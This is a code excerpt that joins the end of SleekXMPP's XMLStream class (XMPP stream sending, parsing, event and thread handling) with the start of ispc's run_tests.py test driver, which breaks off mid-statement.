log.warn("TLS or SSL was enabled, but no certificate was found.")
return
def restart():
if not self.event_handled('ssl_expired_cert'):
log.warn("The server certificate has expired. Restarting.")
self.reconnect()
else:
pem_cert = ssl.DER_cert_to_PEM_cert(self._der_cert)
self.event('ssl_expired_cert', pem_cert)
cert_ttl = cert.get_ttl(self._der_cert)
if cert_ttl is None:
return
if cert_ttl.days < 0:
log.warn('CERT: Certificate has expired.')
restart()
try:
total_seconds = cert_ttl.total_seconds()
except AttributeError:
# for Python < 2.7
total_seconds = (cert_ttl.microseconds + (cert_ttl.seconds + cert_ttl.days * 24 * 3600) * 10**6) / 10**6
log.info('CERT: Time until certificate expiration: %s' % cert_ttl)
self.schedule('Certificate Expiration',
total_seconds,
restart)
def _start_keepalive(self, event):
"""Begin sending whitespace periodically to keep the connection alive.
May be disabled by setting::
self.whitespace_keepalive = False
The keepalive interval can be set using::
self.whitespace_keepalive_interval = 300
"""
if self.whitespace_keepalive:
self.schedule('Whitespace Keepalive',
self.whitespace_keepalive_interval,
self.send_raw,
args=(' ',),
kwargs={'now': True},
repeat=True)
def _remove_schedules(self, event):
"""Remove whitespace keepalive and certificate expiration schedules."""
self.scheduler.remove('Whitespace Keepalive')
self.scheduler.remove('Certificate Expiration')
def start_stream_handler(self, xml):
"""Perform any initialization actions, such as handshakes,
once the stream header has been sent.
Meant to be overridden.
"""
pass
def register_stanza(self, stanza_class):
"""Add a stanza object class as a known root stanza.
A root stanza is one that appears as a direct child of the stream's
root element.
Stanzas that appear as substanzas of a root stanza do not need to
be registered here. That is done using register_stanza_plugin() from
sleekxmpp.xmlstream.stanzabase.
Stanzas that are not registered will not be converted into
stanza objects, but may still be processed using handlers and
matchers.
:param stanza_class: The top-level stanza object's class.
"""
self.__root_stanza.append(stanza_class)
def remove_stanza(self, stanza_class):
"""Remove a stanza from being a known root stanza.
A root stanza is one that appears as a direct child of the stream's
root element.
Stanzas that are not registered will not be converted into
stanza objects, but may still be processed using handlers and
matchers.
"""
self.__root_stanza.remove(stanza_class)
def add_filter(self, mode, handler, order=None):
"""Add a filter for incoming or outgoing stanzas.
These filters are applied before incoming stanzas are
passed to any handlers, and before outgoing stanzas
are put in the send queue.
Each filter must accept a single stanza, and return
either a stanza or ``None``. If the filter returns
``None``, then the stanza will be dropped from being
processed for events or from being sent.
:param mode: One of ``'in'`` or ``'out'``.
:param handler: The filter function.
:param int order: The position to insert the filter in
the list of active filters.
"""
if order:
self.__filters[mode].insert(order, handler)
else:
self.__filters[mode].append(handler)
def del_filter(self, mode, handler):
"""Remove an incoming or outgoing filter."""
self.__filters[mode].remove(handler)
def add_handler(self, mask, pointer, name=None, disposable=False,
threaded=False, filter=False, instream=False):
"""A shortcut method for registering a handler using XML masks.
The use of :meth:`register_handler()` is preferred.
:param mask: An XML snippet matching the structure of the
stanzas that will be passed to this handler.
:param pointer: The handler function itself.
:parm name: A unique name for the handler. A name will
be generated if one is not provided.
:param disposable: Indicates if the handler should be discarded
after one use.
:param threaded: **DEPRECATED**.
Remains for backwards compatibility.
:param filter: **DEPRECATED**.
Remains for backwards compatibility.
:param instream: Indicates if the handler should execute during
stream processing and not during normal event
processing.
"""
# To prevent circular dependencies, we must load the matcher
# and handler classes here.
if name is None:
name = 'add_handler_%s' % self.new_id()
self.register_handler(
XMLCallback(name,
MatchXMLMask(mask, self.default_ns),
pointer,
once=disposable,
instream=instream))
def register_handler(self, handler, before=None, after=None):
"""Add a stream event handler that will be executed when a matching
stanza is received.
:param handler:
The :class:`~sleekxmpp.xmlstream.handler.base.BaseHandler`
derived object to execute.
"""
if handler.stream is None:
self.__handlers.append(handler)
handler.stream = weakref.ref(self)
def remove_handler(self, name):
"""Remove any stream event handlers with the given name.
:param name: The name of the handler.
"""
idx = 0
for handler in self.__handlers:
if handler.name == name:
self.__handlers.pop(idx)
return True
idx += 1
return False
def get_dns_records(self, domain, port=None):
"""Get the DNS records for a domain.
:param domain: The domain in question.
:param port: If the results don't include a port, use this one.
"""
if port is None:
port = self.default_port
resolver = default_resolver()
self.configure_dns(resolver, domain=domain, port=port)
return resolve(domain, port, service=self.dns_service,
resolver=resolver,
use_ipv6=self.use_ipv6,
use_dnspython=self.use_dnspython)
def pick_dns_answer(self, domain, port=None):
"""Pick a server and port from DNS answers.
Gets DNS answers if none available.
Removes used answer from available answers.
:param domain: The domain in question.
:param port: If the results don't include a port, use this one.
"""
if not self.dns_answers:
self.dns_answers = self.get_dns_records(domain, port)
if sys.version_info < (3, 0):
return self.dns_answers.next()
else:
return next(self.dns_answers)
def add_event_handler(self, name, pointer,
threaded=False, disposable=False):
"""Add a custom event handler that will be executed whenever
its event is manually triggered.
:param name: The name of the event that will trigger
this handler.
:param pointer: The function to execute.
:param threaded: If set to ``True``, the handler will execute
in its own thread. Defaults to ``False``.
:param disposable: If set to ``True``, the handler will be
discarded after one use. Defaults to ``False``.
"""
if not name in self.__event_handlers:
self.__event_handlers[name] = []
self.__event_handlers[name].append((pointer, threaded, disposable))
def del_event_handler(self, name, pointer):
"""Remove a function as a handler for an event.
:param name: The name of the event.
:param pointer: The function to remove as a handler.
"""
if not name in self.__event_handlers:
return
# Need to keep handlers that do not use
# the given function pointer
def filter_pointers(handler):
return handler[0] != pointer
self.__event_handlers[name] = list(filter(
filter_pointers,
self.__event_handlers[name]))
def event_handled(self, name):
"""Returns the number of registered handlers for an event.
:param name: The name of the event to check.
"""
return len(self.__event_handlers.get(name, []))
def event(self, name, data=None, direct=False):
"""Manually trigger a custom event.
:param name: The name of the event to trigger.
:param data: Data that will be passed to each event handler.
Defaults to an empty dictionary, but is usually
a stanza object.
:param direct: Runs the event directly if True, skipping the
event queue. All event handlers will run in the
same thread.
"""
if not data:
data = {}
log.debug("Event triggered: " + name)
handlers = self.__event_handlers.get(name, [])
for handler in handlers:
#TODO: Data should not be copied, but should be read only,
# but this might break current code so it's left for future.
out_data = copy.copy(data) if len(handlers) > 1 else data
old_exception = getattr(data, 'exception', None)
if direct:
try:
handler[0](out_data)
except Exception as e:
error_msg = 'Error processing event handler: %s'
log.exception(error_msg, str(handler[0]))
if old_exception:
old_exception(e)
else:
self.exception(e)
else:
self.event_queue.put(('event', handler, out_data))
if handler[2]:
# If the handler is disposable, we will go ahead and
# remove it now instead of waiting for it to be
# processed in the queue.
with self.__event_handlers_lock:
try:
h_index = self.__event_handlers[name].index(handler)
self.__event_handlers[name].pop(h_index)
except:
pass
def schedule(self, name, seconds, callback, args=None,
kwargs=None, repeat=False):
"""Schedule a callback function to execute after a given delay.
:param name: A unique name for the scheduled callback.
:param seconds: The time in seconds to wait before executing.
:param callback: A pointer to the function to execute.
:param args: A tuple of arguments to pass to the function.
:param kwargs: A dictionary of keyword arguments to pass to
the function.
:param repeat: Flag indicating if the scheduled event should
be reset and repeat after executing.
"""
self.scheduler.add(name, seconds, callback, args, kwargs,
repeat, qpointer=self.event_queue)
def incoming_filter(self, xml):
"""Filter incoming XML objects before they are processed.
Possible uses include remapping namespaces, or correcting elements
from sources with incorrect behavior.
Meant to be overridden.
"""
return xml
def send(self, data, mask=None, timeout=None, now=False, use_filters=True):
"""A wrapper for :meth:`send_raw()` for sending stanza objects.
May optionally block until an expected response is received.
:param data: The :class:`~sleekxmpp.xmlstream.stanzabase.ElementBase`
stanza to send on the stream.
:param mask: **DEPRECATED**
An XML string snippet matching the structure
of the expected response. Execution will block
in this thread until the response is received
or a timeout occurs.
:param int timeout: Time in seconds to wait for a response before
continuing. Defaults to :attr:`response_timeout`.
:param bool now: Indicates if the send queue should be skipped,
sending the stanza immediately. Useful mainly
for stream initialization stanzas.
Defaults to ``False``.
:param bool use_filters: Indicates if outgoing filters should be
applied to the given stanza data. Disabling
filters is useful when resending stanzas.
Defaults to ``True``.
"""
if timeout is None:
timeout = self.response_timeout
if hasattr(mask, 'xml'):
mask = mask.xml
if isinstance(data, ElementBase):
if use_filters:
for filter in self.__filters['out']:
data = filter(data)
if data is None:
return
if mask is not None:
log.warning("Use of send mask waiters is deprecated.")
wait_for = Waiter("SendWait_%s" % self.new_id(),
MatchXMLMask(mask))
self.register_handler(wait_for)
if isinstance(data, ElementBase):
with self.send_queue_lock:
if use_filters:
for filter in self.__filters['out_sync']:
data = filter(data)
if data is None:
return
str_data = tostring(data.xml, xmlns=self.default_ns,
stream=self,
top_level=True)
self.send_raw(str_data, now)
else:
self.send_raw(data, now)
if mask is not None:
return wait_for.wait(timeout)
def send_xml(self, data, mask=None, timeout=None, now=False):
"""Send an XML object on the stream, and optionally wait
for a response.
:param data: The :class:`~xml.etree.ElementTree.Element` XML object
to send on the stream.
:param mask: **DEPRECATED**
An XML string snippet matching the structure
of the expected response. Execution will block
in this thread until the response is received
or a timeout occurs.
:param int timeout: Time in seconds to wait for a response before
continuing. Defaults to :attr:`response_timeout`.
:param bool now: Indicates if the send queue should be skipped,
sending the stanza immediately. Useful mainly
for stream initialization stanzas.
Defaults to ``False``.
"""
if timeout is None:
timeout = self.response_timeout
return self.send(tostring(data), mask, timeout, now)
def send_raw(self, data, now=False, reconnect=None):
"""Send raw data across the stream.
:param string data: Any string value.
:param bool reconnect: Indicates if the stream should be
restarted if there is an error sending
the stanza. Used mainly for testing.
Defaults to :attr:`auto_reconnect`.
"""
if now:
log.debug("SEND (IMMED): %s", data)
try:
data = data.encode('utf-8')
total = len(data)
sent = 0
count = 0
tries = 0
with self.send_lock:
while sent < total and not self.stop.is_set():
try:
sent += self.socket.send(data[sent:])
count += 1
except ssl.SSLError as serr:
if tries >= self.ssl_retry_max:
log.debug('SSL error: max retries reached')
self.exception(serr)
log.warning("Failed to send %s", data)
if reconnect is None:
reconnect = self.auto_reconnect
if not self.stop.is_set():
self.disconnect(reconnect,
send_close=False)
log.warning('SSL write error: retrying')
if not self.stop.is_set():
time.sleep(self.ssl_retry_delay)
tries += 1
except Socket.error as serr:
if serr.errno != errno.EINTR:
raise
if count > 1:
log.debug('SENT: %d chunks', count)
except (Socket.error, ssl.SSLError) as serr:
self.event('socket_error', serr, direct=True)
log.warning("Failed to send %s", data)
if reconnect is None:
reconnect = self.auto_reconnect
if not self.stop.is_set():
self.disconnect(reconnect, send_close=False)
else:
self.send_queue.put(data)
return True
def _start_thread(self, name, target, track=True):
self.__thread[name] = threading.Thread(name=name, target=target)
self.__thread[name].daemon = self._use_daemons
self.__thread[name].start()
if track:
self.__active_threads.add(name)
with self.__thread_cond:
self.__thread_count += 1
def _end_thread(self, name, early=False):
with self.__thread_cond:
curr_thread = threading.current_thread().name
if curr_thread in self.__active_threads:
self.__thread_count -= 1
self.__active_threads.remove(curr_thread)
if early:
log.debug('Threading deadlock prevention!')
log.debug(("Marked %s thread as ended due to " + \
"disconnect() call. %s threads remain.") % (
name, self.__thread_count))
else:
log.debug("Stopped %s thread. %s threads remain." % (
name, self.__thread_count))
else:
log.debug(("Finished exiting %s thread after early " + \
"termination from disconnect() call. " + \
"%s threads remain.") % (
name, self.__thread_count))
if self.__thread_count == 0:
self.__thread_cond.notify()
def set_stop(self):
self.stop.set()
# Unlock queues
self.event_queue.put(None)
self.send_queue.put(None)
def _wait_for_threads(self):
with self.__thread_cond:
if self.__thread_count != 0:
log.debug("Waiting for %s threads to exit." %
self.__thread_count)
name = threading.current_thread().name
if name in self.__thread:
self._end_thread(name, early=True)
self.__thread_cond.wait(4)
if self.__thread_count != 0:
log.error("Hanged threads: %s" % threading.enumerate())
log.error("This may be due to calling disconnect() " + \
"from a non-threaded event handler. Be " + \
"sure that event handlers that call " + \
"disconnect() are registered using: " + \
"add_event_handler(..., threaded=True)")
def process(self, **kwargs):
"""Initialize the XML streams and begin processing events.
The number of threads used for processing stream events is determined
by :data:`HANDLER_THREADS`.
:param bool block: If ``False``, then event dispatcher will run
in a separate thread, allowing for the stream to be
used in the background for another application.
Otherwise, ``process(block=True)`` blocks the current
thread. Defaults to ``False``.
:param bool threaded: **DEPRECATED**
If ``True``, then event dispatcher will run
in a separate thread, allowing for the stream to be
used in the background for another application.
Defaults to ``True``. This does **not** mean that no
threads are used at all if ``threaded=False``.
Regardless of these threading options, these threads will
always exist:
- The event queue processor
- The send queue processor
- The scheduler
"""
if 'threaded' in kwargs and 'block' in kwargs:
raise ValueError("process() called with both " + \
"block and threaded arguments")
elif 'block' in kwargs:
threaded = not(kwargs.get('block', False))
else:
threaded = kwargs.get('threaded', True)
for t in range(0, HANDLER_THREADS):
log.debug("Starting HANDLER THREAD")
self._start_thread('event_thread_%s' % t, self._event_runner)
self._start_thread('send_thread', self._send_thread)
self._start_thread('scheduler_thread', self._scheduler_thread)
if threaded:
# Run the XML stream in the background for another application.
self._start_thread('read_thread', self._process, track=False)
else:
self._process()
def _process(self):
"""Start processing the XML streams.
Processing will continue after any recoverable errors
if reconnections are allowed.
"""
# The body of this loop will only execute once per connection.
# Additional passes will be made only if an error occurs and
# reconnecting is permitted.
while True:
shutdown = False
try:
# The call to self.__read_xml will block and prevent
# the body of the loop from running until a disconnect
# occurs. After any reconnection, the stream header will
# be resent and processing will resume.
while not self.stop.is_set():
# Only process the stream while connected to the server
if not self.state.ensure('connected', wait=0.1):
break
# Ensure the stream header is sent for any
# new connections.
if not self.session_started_event.is_set():
self.send_raw(self.stream_header, now=True)
if not self.__read_xml():
# If the server terminated the stream, end processing
break
except KeyboardInterrupt:
log.debug("Keyboard Escape Detected in _process")
self.event('killed', direct=True)
shutdown = True
except SystemExit:
log.debug("SystemExit in _process")
shutdown = True
except (SyntaxError, ExpatError) as e:
log.error("Error reading from XML stream.")
self.exception(e)
except (Socket.error, ssl.SSLError) as serr:
self.event('socket_error', serr, direct=True)
log.error('Socket Error #%s: %s', serr.errno, serr.strerror)
except ValueError as e:
msg = e.message if hasattr(e, 'message') else e.args[0]
if 'I/O operation on closed file' in msg:
log.error('Can not read from closed socket.')
else:
self.exception(e)
except Exception as e:
if not self.stop.is_set():
log.error('Connection error.')
self.exception(e)
if not shutdown and not self.stop.is_set() \
and self.auto_reconnect:
self.reconnect()
else:
self.disconnect()
break
def __read_xml(self):
"""Parse the incoming XML stream
Stream events are raised for each received stanza.
"""
depth = 0
root = None
for event, xml in ET.iterparse(self.filesocket, (b'end', b'start')):
if event == b'start':
if depth == 0:
# We have received the start of the root element.
root = xml
log.debug('RECV: %s', tostring(root, xmlns=self.default_ns,
stream=self,
top_level=True,
open_only=True))
# Perform any stream initialization actions, such
# as handshakes.
self.stream_end_event.clear()
self.start_stream_handler(root)
# We have a successful stream connection, so reset
# exponential backoff for new reconnect attempts.
self.reconnect_delay = 1.0
depth += 1
if event == b'end':
depth -= 1
if depth == 0:
# The stream's root element has closed,
# terminating the stream.
log.debug("End of stream recieved")
self.stream_end_event.set()
return False
elif depth == 1:
# We only raise events for stanzas that are direct
# children of the root element.
try:
self.__spawn_event(xml)
except RestartStream:
return True
if root is not None:
# Keep the root element empty of children to
# save on memory use.
root.clear()
log.debug("Ending read XML loop")
def _build_stanza(self, xml, default_ns=None):
"""Create a stanza object from a given XML object.
If a specialized stanza type is not found for the XML, then
a generic :class:`~sleekxmpp.xmlstream.stanzabase.StanzaBase`
stanza will be returned.
:param xml: The :class:`~xml.etree.ElementTree.Element` XML object
to convert into a stanza object.
:param default_ns: Optional default namespace to use instead of the
stream's current default namespace.
"""
if default_ns is None:
default_ns = self.default_ns
stanza_type = StanzaBase
for stanza_class in self.__root_stanza:
if xml.tag == "{%s}%s" % (default_ns, stanza_class.name) or \
xml.tag == stanza_class.tag_name():
stanza_type = stanza_class
break
stanza = stanza_type(self, xml)
if stanza['lang'] is None and self.peer_default_lang:
stanza['lang'] = self.peer_default_lang
return stanza
def __spawn_event(self, xml):
"""
Analyze incoming XML stanzas and convert them into stanza
objects if applicable and queue stream events to be processed
by matching handlers.
:param xml: The :class:`~sleekxmpp.xmlstream.stanzabase.ElementBase`
stanza to analyze.
"""
# Apply any preprocessing filters.
xml = self.incoming_filter(xml)
# Convert the raw XML object into a stanza object. If no registered
# stanza type applies, a generic StanzaBase stanza will be used.
stanza = self._build_stanza(xml)
for filter in self.__filters['in']:
if stanza is not None:
stanza = filter(stanza)
if stanza is None:
return
log.debug("RECV: %s", stanza)
# Match the stanza against registered handlers. Handlers marked
# to run "in stream" will be executed immediately; the rest will
# be queued.
unhandled = True
matched_handlers = [h for h in self.__handlers if h.match(stanza)]
for handler in matched_handlers:
if len(matched_handlers) > 1:
stanza_copy = copy.copy(stanza)
else:
stanza_copy = stanza
handler.prerun(stanza_copy)
self.event_queue.put(('stanza', handler, stanza_copy))
try:
if handler.check_delete():
self.__handlers.remove(handler)
except:
pass # not thread safe
unhandled = False
# Some stanzas require responses, such as Iq queries. A default
# handler will be executed immediately for this case.
if unhandled:
stanza.unhandled()
def _threaded_event_wrapper(self, func, args):
"""Capture exceptions for event handlers that run
in individual threads.
:param func: The event handler to execute.
:param args: Arguments to the event handler.
"""
# this is always already copied before this is invoked
orig = args[0]
try:
func(*args)
except Exception as e:
error_msg = 'Error processing event handler: %s'
log.exception(error_msg, str(func))
if hasattr(orig, 'exception'):
orig.exception(e)
else:
self.exception(e)
def _event_runner(self):
"""Process the event queue and execute handlers.
The number of event runner threads is controlled by HANDLER_THREADS.
Stream event handlers will all execute in this thread. Custom event
handlers may be spawned in individual threads.
"""
log.debug("Loading event runner")
try:
while not self.stop.is_set():
event = self.event_queue.get()
if event is None:
continue
etype, handler = event[0:2]
args = event[2:]
orig = copy.copy(args[0])
if etype == 'stanza':
try:
handler.run(args[0])
except Exception as e:
error_msg = 'Error processing stream handler: %s'
log.exception(error_msg, handler.name)
orig.exception(e)
elif etype == 'schedule':
name = args[2]
try:
log.debug('Scheduled event: %s: %s', name, args[0])
handler(*args[0], **args[1])
except Exception as e:
log.exception('Error processing scheduled task')
self.exception(e)
elif etype == 'event':
func, threaded, disposable = handler
try:
if threaded:
x = threading.Thread(
name="Event_%s" % str(func),
target=self._threaded_event_wrapper,
args=(func, args))
x.daemon = self._use_daemons
x.start()
else:
func(*args)
except Exception as e:
error_msg = 'Error processing event handler: %s'
log.exception(error_msg, str(func))
if hasattr(orig, 'exception'):
orig.exception(e)
else:
self.exception(e)
elif etype == 'quit':
log.debug("Quitting event runner thread")
break
except KeyboardInterrupt:
log.debug("Keyboard Escape Detected in _event_runner")
self.event('killed', direct=True)
self.disconnect()
except SystemExit:
self.disconnect()
self.event_queue.put(('quit', None, None))
self._end_thread('event runner')
def _send_thread(self):
"""Extract stanzas from the send queue and send them on the stream."""
try:
while not self.stop.is_set():
while not self.stop.is_set() and \
not self.session_started_event.is_set():
self.session_started_event.wait(timeout=0.1) # Wait for session start
if self.__failed_send_stanza is not None:
data = self.__failed_send_stanza
self.__failed_send_stanza = None
else:
data = self.send_queue.get() # Wait for data to send
if data is None:
continue
log.debug("SEND: %s", data)
enc_data = data.encode('utf-8')
total = len(enc_data)
sent = 0
count = 0
tries = 0
try:
with self.send_lock:
while sent < total and not self.stop.is_set() and \
self.session_started_event.is_set():
try:
sent += self.socket.send(enc_data[sent:])
count += 1
except ssl.SSLError as serr:
if tries >= self.ssl_retry_max:
log.debug('SSL error: max retries reached')
self.exception(serr)
log.warning("Failed to send %s", data)
if not self.stop.is_set():
self.disconnect(self.auto_reconnect,
send_close=False)
log.warning('SSL write error: retrying')
if not self.stop.is_set():
time.sleep(self.ssl_retry_delay)
tries += 1
except Socket.error as serr:
if serr.errno != errno.EINTR:
raise
if count > 1:
log.debug('SENT: %d chunks', count)
self.send_queue.task_done()
except (Socket.error, ssl.SSLError) as serr:
self.event('socket_error', serr, direct=True)
log.warning("Failed to send %s", data)
if not self.stop.is_set():
self.__failed_send_stanza = data
self._end_thread('send')
self.disconnect(self.auto_reconnect, send_close=False)
return
except Exception as ex:
log.exception('Unexpected error in send thread: %s', ex)
self.exception(ex)
if not self.stop.is_set():
self._end_thread('send')
self.disconnect(self.auto_reconnect)
return
self._end_thread('send')
def _scheduler_thread(self):
self.scheduler.process(threaded=False)
self._end_thread('scheduler')
def exception(self, exception):
"""Process an unknown exception.
Meant to be overridden.
:param exception: An unhandled exception object.
"""
pass
# To comply with PEP8, method names now use underscores.
# Deprecated method names are re-mapped for backwards compatibility.
XMLStream.startTLS = XMLStream.start_tls
XMLStream.registerStanza = XMLStream.register_stanza
XMLStream.removeStanza = XMLStream.remove_stanza
XMLStream.registerHandler = XMLStream.register_handler
XMLStream.removeHandler = XMLStream.remove_handler
XMLStream.setSocket = XMLStream.set_socket
XMLStream.sendRaw = XMLStream.send_raw
XMLStream.getId = XMLStream.get_id
XMLStream.getNewId = XMLStream.new_id
XMLStream.sendXML = XMLStream.send_xml
|
run_tests.py
|
#!/usr/bin/python
#
# Copyright (c) 2013-2018, Intel Corporation
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Intel Corporation nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER
# OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# test-running driver for ispc
# utility routine to print an update on the number of tests that have been
# finished. Should be called with the lock held..
def update_progress(fn, total_tests_arg, counter, max_test_length_arg):
counter.value += 1
if options.non_interactive == False:
progress_str = " Done %d / %d [%s]" % (counter.value, total_tests_arg, fn)
# spaces to clear out detrius from previous printing...
spaces_needed = max_test_length_arg - len(fn)
for x in range(spaces_needed):
progress_str += ' '
progress_str += '\r'
sys.stdout.write(progress_str)
sys.stdout.flush()
# This is workaround for missing timeout functionality in Python 2.7.
class RunWithTimeout(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
self.output = ""
def run(self, timeout):
def target():
try:
self.process = subprocess.Popen(self.cmd, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
except:
print_debug("ERROR: The child (%s) raised an exception: %s\n" % (cmd, sys.exc_info()[1]), s, run_tests_log)
raise
out = self.process.communicate()
self.output += out[0].decode("utf-8")
self.output += out[1].decode("utf-8")
thread = threading.Thread(target=target)
thread.start()
timeout_fail = False
thread.join(timeout)
if thread.is_alive():
timeout_fail = True
self.process.terminate()
thread.join()
return (self.process.returncode, self.output, timeout_fail)
# 240 is enough even for longest test under sde.
def run_command(cmd, timeout=600):
if options.verbose:
print_debug("Running: %s\n" % cmd, s, run_tests_log)
# Here's a bit tricky part. To pass a command for execution we should
# break down the line in to arguments. shlex class is designed exactly
# for this purpose, but by default it interprets escape sequences.
# On Windows backslaches are all over the place and they are treates as
# ESC-sequences, so we have to set manually to not interpret them.
lexer = shlex.shlex(cmd, posix=True)
lexer.whitespace_split = True
lexer.escape = ''
arg_list = list(lexer)
run = RunWithTimeout(cmd=arg_list)
(ret_code, output, is_timeout) = run.run(timeout)
return (ret_code, output, is_timeout)
# run the commands in cmd_list
def run_cmds(compile_cmds, run_cmd, filename, expect_failure):
for cmd in compile_cmds:
(return_code, output, timeout) = run_command(cmd, 10)
compile_failed = (return_code != 0)
if compile_failed:
print_debug("Compilation of test %s failed %s \n" % (filename, "due to TIMEOUT" if timeout else ""), s, run_tests_log)
if output != "":
print_debug("%s" % output.encode("utf-8"), s, run_tests_log)
return (1, 0)
if not options.save_bin:
(return_code, output, timeout) = run_command(run_cmd)
run_failed = (return_code != 0) or timeout
else:
run_failed = 0
surprise = ((expect_failure and not run_failed) or
(not expect_failure and run_failed))
if surprise == True:
print_debug("Test %s %s (return code %d) \n" % \
(filename, "unexpectedly passed" if expect_failure else "failed",
return_code), s, run_tests_log)
if output != "":
print_debug("%s\n" % output.encode("utf-8"), s, run_tests_log)
if surprise == True:
return (0, 1)
else:
return (0, 0)
def add_prefix(path):
global is_windows
if is_windows:
# On Windows we run tests in tmp dir, so the root is one level up.
input_prefix = "..\\"
else:
input_prefix = ""
path = input_prefix + path
path = os.path.abspath(path)
return path
def check_test(filename):
prev_arch = False
prev_os = False
done_arch = True
done_os = True
done = True
global is_windows
if is_windows:
oss = "windows"
else:
oss = "linux"
b = buffer(file(add_prefix(filename)).read());
for run in re.finditer('// *rule: run on .*', b):
arch = re.match('.* arch=.*', run.group())
if arch != None:
if re.search(' arch='+options.arch+'$', arch.group()) != None:
prev_arch = True
if re.search(' arch='+options.arch+' ', arch.group()) != None:
prev_arch = True
done_arch = prev_arch
OS = re.match('.* OS=.*', run.group())
if OS != None:
if re.search(' OS='+oss, OS.group()) != None:
prev_os = True
done_os = prev_os
done = done_arch and done_os
for skip in re.finditer('// *rule: skip on .*', b):
if re.search(' arch=' + options.arch + '$', skip.group())!=None:
done = False
if re.search(' arch=' + options.arch + ' ', skip.group())!=None:
done = False
if re.search(' OS=' + oss, skip.group())!=None:
done = False
return done
def run_test(testname):
# testname is a path to the test from the root of ispc dir
# filename is a path to the test from the current dir
# ispc_exe_rel is a relative path to ispc
filename = add_prefix(testname)
ispc_exe_rel = add_prefix(ispc_exe)
# is this a test to make sure an error is issued?
want_error = (filename.find("tests_errors") != -1)
if want_error == True:
if (options.target == "knc-generic"):
ispc_cmd = ispc_exe_rel + " --werror --nowrap %s --arch=%s --target=%s" % \
(filename, options.arch, "generic-16")
elif (options.target == "knl-generic"):
ispc_cmd = ispc_exe_rel + " --werror --nowrap %s --arch=%s --target=%s" % \
(filename, options.arch, "generic-16")
else:
ispc_cmd = ispc_exe_rel + " --werror --nowrap %s --arch=%s --target=%s" % \
(filename, options.arch, options.target)
(return_code, output, timeout) = run_command(ispc_cmd, 10)
got_error = (return_code != 0) or timeout
# figure out the error message we're expecting
file = open(filename, 'r')
firstline = file.readline()
firstline = firstline.replace("//", "")
firstline = firstline.lstrip()
firstline = firstline.rstrip()
file.close()
if re.search(firstline, output) == None:
print_debug("Didn't see expected error message %s from test %s.\nActual output:\n%s\n" % \
(firstline, testname, output), s, run_tests_log)
return (1, 0)
elif got_error == False:
print_debug("Unexpectedly no errors issued from test %s\n" % testname, s, run_tests_log)
return (1, 0)
else:
return (0, 0)
else:
# do we expect this test to fail?
should_fail = (testname.find("failing_") != -1)
# We need to figure out the signature of the test
# function that this test has.
sig2def = { "f_v(" : 0, "f_f(" : 1, "f_fu(" : 2, "f_fi(" : 3,
"f_du(" : 4, "f_duf(" : 5, "f_di(" : 6, "f_sz" : 7 }
file = open(filename, 'r')
match = -1
for line in file:
# look for lines with 'export'...
if line.find("export") == -1:
continue
# one of them should have a function with one of the
# declarations in sig2def
for pattern, ident in list(sig2def.items()):
if line.find(pattern) != -1:
match = ident
break
file.close()
if match == -1:
error("unable to find function signature in test %s\n" % testname, 0)
return (1, 0)
else:
global is_generic_target
global is_nvptx_target
global is_nvptx_nvvm
if is_windows:
if is_generic_target:
obj_name = "%s.cpp" % os.path.basename(filename)
else:
obj_name = "%s.obj" % os.path.basename(filename)
exe_name = "%s.exe" % os.path.basename(filename)
cc_cmd = "%s /I. /Zi /nologo /DTEST_SIG=%d %s %s /Fe%s" % \
(options.compiler_exe, match, add_prefix("test_static.cpp"), obj_name, exe_name)
if should_fail:
cc_cmd += " /DEXPECT_FAILURE"
else:
if is_generic_target:
obj_name = "%s.cpp" % testname
elif is_nvptx_target:
if os.environ.get("NVVM") == "1":
is_nvptx_nvvm = True
obj_name = "%s.ll" % testname
else:
obj_name = "%s.ptx" % testname
is_nvptx_nvvm = False
else:
obj_name = "%s.o" % testname
exe_name = "%s.run" % testname
if options.arch == 'arm':
gcc_arch = '--with-fpu=hardfp -marm -mfpu=neon -mfloat-abi=hard'
else:
if options.arch == 'x86':
gcc_arch = '-m32'
else:
gcc_arch = '-m64'
gcc_isa=""
if options.target == 'generic-4':
gcc_isa = '-msse4.2'
if (options.target == 'generic-8'):
if (options.include_file.find("knc-i1x8.h")!=-1 or options.include_file.find("knc-i1x8unsafe_fast.h")!=-1):
gcc_isa = '-mmic'
else:
gcc_isa = '-mavx'
if (options.target == 'generic-16' or options.target == 'generic-32' or options.target == 'generic-64') \
and (options.include_file.find("knc-i1x16.h")!=-1 or options.include_file.find("knc.h")!=-1 or options.include_file.find("knc2x.h")!=-1):
gcc_isa = '-mmic'
if (options.target == "knc-generic"):
cc_cmd = "%s -O2 -I. %s %s test_static.cpp -DTEST_SIG=%d %s -o %s" % \
(options.compiler_exe, gcc_arch, "-mmic", match, obj_name, exe_name)
elif (options.target == "knl-generic"):
cc_cmd = "%s -O2 -I. %s %s test_static.cpp -DTEST_SIG=%d %s -o %s" % \
(options.compiler_exe, gcc_arch, "-xMIC-AVX512", match, obj_name, exe_name)
else:
cc_cmd = "%s -O2 -I. %s %s test_static.cpp -DTEST_SIG=%d %s -o %s" % \
